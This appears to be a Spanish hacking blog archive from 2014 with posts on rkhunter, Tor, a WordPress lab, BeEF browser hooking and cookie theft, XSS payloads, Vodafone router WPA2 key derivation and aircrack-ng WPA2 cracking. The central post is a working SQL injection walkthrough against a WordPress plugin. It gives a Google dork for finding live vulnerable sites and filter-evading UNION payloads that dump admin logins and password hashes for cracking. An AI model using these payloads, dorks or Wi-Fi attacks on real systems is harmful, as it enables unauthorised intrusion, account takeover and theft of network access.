viernes, 31 de enero de 2014

Rkhunter, el cazador de rootkits

Hoy vamos  a aprender a usar la herramienta para entornos Linux llamada rkhunter para localizar y eliminar rootkits de nuestro sistema.

¿Que son los rootkits? Los rootkits son programas ocultados normalmente entre los archivos protegidos del sistema con altos privilegios en el sistema permitiendo al atacante acceder al sistema infectado.

La palabra rootkit viene de root (administrador con control total en el sistema) y kit ( conjunto de programas, drivers, claves en el registro, procesos y puertos)

Para instalarlo podemos usar los repositorios de apt con: apt-get install rkhunter


Si queremos ver las opciones que tiene basta con poner: rkhunter

Asi que vamos a hacer un analisis basico: rkhunter --check


Pero en caso de que el estado sea warning deberemos investigar para ver si es malicioso o un falso positivo. En este caso se dio en el apartado system commands.


Y en un segundo análisis busca indicios de rootkits maliciosos que tiene en su base de datos.

Después de unos analisis extras que hace nos emitirá un informe resumido sobre los resultados obtenidos, que guarda una copia en /var/log/rkhunter.log


Sin duda es una gran herramienta con un peso reducido, fácil de usar y muy eficaz para defendernos en entornos Linux.


Saludos guerreros!!

miércoles, 29 de enero de 2014

Como instalar TOR en Windows

Hoy me dio por jugar con proxys para saltarme una pagina por restricciones de ip, así que me puse a probar sitios que ofrecian navegar como proxy y hacer mis pruebas con ips publicas. Hasta que me dije pues hoy es el dia de jugar con tor, y alla vamos.

Sitio por pivote de navegación (proxy).

Para no repetir lo típico de todas las paginas con definiciones os dejo una conferencia de las obligadas para todo el que se quiera iniciar en este mundillo ya sea por que su país no hay derecho de libre opinion, saltar proxys restrictivos de empresas, restricciones del ISP o simplemente para "ocultar su verdadera ip".
Charla de Jose Luis Vedeguer (NavajaNegra)

Aquí os dejo un pequeño manual por si tenéis dudas en la instalación:


El navegador de tor aqui: tor browser y una vez lo tenemos descargado lo instalamos:

Cuando haya terminado de instalarse, y que se autoconfigure estaremos listos para usar el navegador tor. 

Como veis es un mozilla con una serie de plugins preinstalados en este pack:
Https everywhere- Cifra el trafico HTTP para evitar sniffers desde nuestro punto al proxy de entrada.
Noscript- Evita que se cargue el código javascript en nuestro cliente.
Tor Browser - Pequeño panel de control con opciones para configurarlo.
Tor launcher - Lanza tor como pagina principal y buscador.


Una de las opciones que miraremos es algún servicio que nos muestre nuestra ip publica.

Recordar que al usar un proxy eres anonimo para la pagina final pero no para el proxy de entrada y el nodo de salida puede leer tu trafico.
Nosotros somos alice.

Vidalia es otro servicio que ofrece torproject y es para configurar o ver quien esta en tor.

En este menu podemos configuramos que tipo de nodo queremos ser en la red TOR: cliente, pivote, punto de salida o primer nodo.

Usar como nodo de salida: Positivo (puedes ver los datos en claro), Negativo (Cometes un delito fijo, y tu eres el ultimo que establece la conexión).



Saludos!

domingo, 26 de enero de 2014

Laboratorio Wordpress

Los etical hackers tenemos claro nuestros principios y moralidad, no vamos "hackeando" sitios ajenos sin autorización, pues para eso están los laboratorios que nos permiten hacer pruebas pudiendo testear desde el  lado del administrador y del atacante.

Las paginas mas atacadas en 2013 fueron los sitios en plataformas Wordpress no actualizados a ultimas versiones o plugins vulnerables.

Hoy os presento un labatorio para montar en vuestro sistema llamado Wordpressa de Websec.


Manual:
1. Necesitaremos montarlo sobre un XAMPP (Apache, MySQL, Php y Perl) 
2. Descargamos Wordpressa del sitio oficial
3. Copiamos la carpeta wordpressa  en C:/xampp/htdocs

4. Iniciamos XAMPP Control, start a Apache y Mysql.

5. Iniciamos el PhpMySql, para eso introducimos en el buscador localhost. y nos dirigimos a al panel de phpmysql. Ahora creamos una Base de datos.

6. Ahora importaremos la base de datos que nos vino en el winrar, llamado wordpressa.sql.zip


7. Accedemos a la pagina principal para ver que todo funciona correctamente: localhost/wordpressa


En estos momentos tenemos preparados nuestro laboratorio para hacer nuestras pruebas.

En breve publicare como atacarlo, pero mejor que tu pruebes a atacarlo como deberes.
Happy Hacking!!

sábado, 25 de enero de 2014

Introduccion a Beef Framework

Beef es una potente herramienta que nos permitira mediante interfaz web realizar ataques script mediante zombies como pasarela al sitio a atacar.

Vamos a iniciarla para ir viendo sus opciones, para ello vamos a Kali > Servicios del sistema >BeEF > BeEf start.

Y ahora la abriremos en Herramientas de explotacion > Plataforma Xss beef > Beef, y llegaremos al login web. Las credenciales por defecto son beef-beef.




Y entraremos al inicio. 

Lo primero que haremos sera darle al primer here, esto nos servira para capturarnos a nosotros mismos. y si introducimos esto en el navegador de otra persona también lo capturara.

Victima introduciendo la dirección solicitada.


Y en nuestro panel de administración ya tendremos a nuestros zombie. Consiguiendo sus características básicas en la pestaña details.


Si nos movemos por estas pestañas, una de las que mas usaremos sera Commands, que usaremos para ejecutar nuestras acciones sobre el zombie.


Colores:
Verde- El comando trabaja con el objetivo y deberia ser invisible para el usuario.
Naranja- El comando trabajo con el objetivo pero puede ser visible por el usuario.
Gris- El comando aun no se ha verificado que funcione contra el objetivo.
Rojo- El comando no funciona contra este objetivo.

Podemos probar con Get Cookie y ver el resultado. Simplemente presionamos "execute" y nos mostrara el resultado. Por si tuviera alguna cookie que pudiera resultar útil, en este caso muestra la de nuestra web comprometida.



Una interesante es la redirección, que nos enlazara los enlaces que se muestren por nuestra pagina a la que deseemos que sea redirigido.

Como veis los enlaces han sido editados automaticamente por www.mznlabsec.blogspot.com y justo al clickar en alguno de ellos nos redirige al blog.

Esto es ir probando opciones y jugando con ellas, muchas de estas no tendrán éxito o tardan bastante en obtener resultados, pero vale la pena invertir unas horas para emitir tu propio juicio sobre la herramienta, pero su principal fuerte sera utilizarla con Metasploit para poder jugar con la parte de payloads.


Saludos!

viernes, 24 de enero de 2014

Introducion al Cross Site Scripting XSS

Hoy vamos a hablar de otra vulnerabilidad web muy común y que ocupa una de las primeras posiciones en el OWASP TOP10 Vulnerabilidades Web.

Cross Site Scripting, conocida como XSS, es una vulnerabilidad por exceso de libertad en los parámetros y que permiten inyectar código HTML y Javascript son los mas usados.

Distinguiremos 2 tipos:

XSS Reflejado: También llamado Xss no persistente, este tipo provoca modificaciones en el sitio web pero solo temporalmente, un ejemplo podía ser un buscador interno que en el resultado salieran imágenes que el hacker ha inyectado

En este caso una de las maneras mas fáciles es inyectar código HTML en este caso sera una imagen en un buscador, el atacante le valio con inyectar: "><img src="http://i55.tinypic.com/witu7d.png" height="650" width="1000"> . Enlace.


Otro clásico de inyecciones XSS es insertar código Javascript en el sitio, el ejemplo mas claro son las famosas alerts. En este caso introducimos "><script>alert("VULNERABLE A XSS"); </script>




XSS Persistente: El XSS persistente perdura en el cierre de la sesión, muchos de ellos son guardados en la base de datos por un error de validación del campo en el que se interactuaba.

Si pensais que esto es un juego pues algo si, existe un ranking de hackers basados en XSS donde lo publican y puntúan en  XSSED
Donde impresiona ver hackeos a paypal, facebook, google, bancos, gobiernos, amazon y muchísimos mas.

Podeis consultarlos con el mirror. Y ver los Owneds que se muestran.



Muy pronto taller de hacking por XSS con Kali !

Saludos guerreros!!

martes, 21 de enero de 2014

Hacking all Wordpress carrer-details

Hoy es mi publicación numero 100, y esperaba que fuera especial y que mejor que comprometer los sitios basados en Wordpress.

Hoy vamos a poner en practicas lo que hemos aprendido con SQL Injection para hacerlo a lo grande!

Vamos a ello!!


Exploit publicado:
  1. # [+] Exploit Title: Wordpress All Version career details Sql Injection Vulnerability
  2. # [+] Google Dork: inurl:/career-details/?jobid=
  3. # [+] Date: 10/10/2013
  4. # [+] Exploit Author: Iranian_Dark_Coders_Team
  5. # [+] Discovered By: Black.Hack3r
  6. # [+] Version: All Version
  7. # [+] Security Risk: High
  8. # [+] Platforms: php
  9. # [+] Tested on: Windows 7


Afecta a todas las versiones con el plugin "career details" por medio de una vulnerabilidad de validación en los parametros SQL.

Buscamos con el dork el resultado de sitios web cacheados por Google.

Como siempre hacemos en las inyecciones sera poner nuestra comilla haber que pasa...

Si lo queremos hacerlo sobre nuestra red debemos insalar un Wordpress, rellenarla un poco e instalar el plugin de career-details y a probar.
Exploit: 
[url]/career-details/?jobid=3'


Prueba:
[url]/career-details/?jobid=3+order+by+4-- No Error


[url]/career-details/?jobid=3+order+by+5-- Error



Configurando para las salidas de parametros
[url]/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,2,3,4-- 



Sacar todas las bases de datos
[url]
/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(SCHEMA_NAME)*/)),3,4 /*!12345from*/ /*!12345INFORMATION_SCHEMa.SCHEMATA*/-- 






Buscando esta base de datos
[url]/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,database(),3,4 /*!12345from*/ wp_users--



Tablas de esa base de datos
[url]
/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(table_name)*/)),3,4 /*!12345from*/ /*!12345information_schema.tables*/ /*!12345where*/ /*!12345table_schema*/ =database()-- 



Columnas en la tabla wp_users 
[url]/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(COLUMN_NAME)*/)),3,4 /*!12345from*/ /*!12345information_schema.columns*/ /*!12345where*/ /*!12345table_name*/ =CHAR(119, 112, 95, 117, 115, 101, 114, 115)-- 





Sacar la usuario admin y contraseña
[url]/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(ID,0x3a,user_login,0x3a,user_pass)*/)),3,4 /*!12345from*/ wp_users--


Ahora buscaríamos un descifrador del hash, lo mas probable que sea MD5 y con suerte podemos tenerlo en un momento.


* Este post no tiene intención malintencionada , esta hecho con intención de aprender y ver los peligros en este caso de Wordpress por culpa de un plugin vulnerable que puede comprometer la seguridad del sitio. 

sábado, 18 de enero de 2014

Calcula la contraseña de los routers Vodafone

Hace poco se publico en SecurityByDefault, que un investigador llamado Stefan Viehböck había encontrado el algoritmo con el que los routers EasyBox generaban sus claves WPA2 y siendo Vodafone distribuidor de los routers afectados.

Me puse a hacer manualmente todo el proceso de generación que propusieron SbD y la verdad que fue un rato de lo mas entretenido y un reto personal.


Así que os pongo paso a paso como lo hice:
Elegimos un router Vodafone y miramos su MAC en este caso: 00:12:BF:91:0B:EC

Pasamos los 2 últimos bloques de hexadecimal a decimal:
0B:EC > 3052


Rellenamos con 0 a la izquierda hasta llegar a 5 cifras: 03052


Se descompone el numero y asignamos variables:
$6= 0 $7= 3 $8= 0 $9= 5 $10= 2


Lo mismo con los 6 ultimos cuartetos de la MAC:
N7= 9 M8= 1 M9= 0 M10= B M11= E M12= C


Se calcula K1, mediante el ultimo nibble (medio byte) de esta suma (S7+S8+M11+M12):

Si lo pasamos es 30EC, sustituyendo los valores es 3+0+14+12=29
Este valor 29 que esta en decimal lo convertimos a hexadecimal > 1D

Ahora debemos seleccionar medio byte, si 1D es 00011101 la mitad sera  1101 que traducido a hexadecimal es D.


6. Para la variable K2 sera el mismo proceso pero haciendo (M9+M10+S9+S10):

Tenemos 0B52, y lo sumamos 0+11+5+2= 18.
Lo convertimos de decimal a hexadecimal 18 > 12

Si 12 es 0001 0010 ,la mitad es 0010 que es 2.


7. Ahora calcularemos los XOR, con ayuda de miniwebtools para automatizarlo:
X1= K1 xor S10 = D xor 2 = F
X2= K1 xor S9 = 8
X3= K1 xor S8 =D
Y1= K2 xor M10=9
Y2= K2 xor M11=C
Y3= K2 xor M12=E
Z1= M11 xor S10=C
Z2= M12 xor S9=9
Z3= K1 xor K2=F

8. Y Por ultimo los ordenamos como muestra el algoritmo: Quedando F9C8C9DEF

Y ya existen herramientas para calcularlas automáticamente y desarrolladas por el equipo de Stefan.



Este post es una explicación del post de SecurityByDefault mas detallado y como fin de tenerlo documentado y como reto personal.

Saludos!!

viernes, 17 de enero de 2014

Hackear WPA WPA2 sin WPS

Hoy os traigo un enigma en el mundo wifi, ¿Puedo hackear una wifi WPA2 sin WPS?.

Pues a pedido de las miembros de Backtrack Academy esto va por vosotros gente, disfrutenlo ;)

¿Que vamos hacer?
Vamos a elegir una wifi con cifrado WPA2 / WPA PSK y sacaremos su contraseña.

¿Que necesitamos?
Un portatil con 1 maquina virtual con Kali Linux o Backtrack para usar la suite de aircrack y una antena wifi, yo usare mi inseparable Alfa AWUSH036H por usb y un diccionario que explicaremos cuando se vaya a necesitar.

Buscamos a la victima
La victima seremos nosotros mismos, en mi caso he configurado el router con WPA2 y una clave relativamente compleja.




Lo primero que haremos sera que Kali detecte nuestra tarjeta wifi.
airmon


Ahora cambiaremos nuestra MAC para despistar. Debemos desactivarla, asignar la nueva y volverla a activar:
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55
ifconfig wlan0 up
cambiando mac


Vamos a hacer un barrido para ver todos los puntos de acceso .Podemos usar genericamente: airodump-ng mon0 para localizar los datos que necesitaremos en el siguiente paso.
analisis red


Ahora capturamos paquetes hasta conseguir el Handshake.
airodump-ng --bssid 5C:33:8E:A7:D4:B8 -c 7 -w wpa2labs.cap mon0

--bssid 5C:33:8E:A7:D4:B8: Mac del router
-c 7: Canal del router
-w wpa2labs.cap : archivo .cap donde se guardara el análisis del traficomon0: interfaz de red

airodump


Para capturar el handshake tenemos 2 opciones: esperar a que se conecte un nuevo cliente o desautentificar a los que estan para que se vuelvan a conectar.

Yo elijo la segunda, usamos aireplay-ng para esto:
aireplay-ng -0 30 -a 5C:33:8E:A7:D4:B8 mon0

-0 30: Enviamos 30 Desautentificaciones
-a 5C:33:8E:A7:D4:B8: Mac del router
mon0: interfaz de red
aireplay


Una vez lo tenemos usaremos nuestro diccionario, puedes creartelo tu o puedes hacerlo. Simplemente es un bloc de notas con una contraseña por linea.
aircrack-ng -w 10kcommon.txt wpa2labs-01.cap

-w 10kcommon.txt: Es el diccionario que he creado
wpa2labs-01.cap: Es el archivo que se creo en los pasos anteriores
aireplay

Ahora empezara a probar combinaciones hasta dar con la buena, dependiendo la longitud del diccionario y de la potencia de calculo del ordenador dependera el tiempo de crackeo.
clave wifi

En el caso de necesitar diccionarios muy grandes podemos crear rainbow tables con airolib-ng.

¿Como evitar ser victima de este ataque?
1. Pon cifrado WPA o WPA2 
2. Desactiva el WPS o cambia el que viene por defecto
3. Pon una contraseña larga que no se use en diccionarios, preferiblemente español para evitar los genéricos aunque sean fáciles de recordar ejemplo: lasgallinasponenhuevos00
howsecureismypassword



Saludos guerreros!